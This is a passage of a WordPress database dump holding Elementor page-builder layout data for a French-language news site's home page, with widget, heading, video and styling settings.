horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3102,927,'_elementor_version','0.4'),(3103,927,'_elementor_css','a:3:{s:4:\"time\";i:1511347834;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3105,928,'_elementor_edit_mode','builder'),(3106,928,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\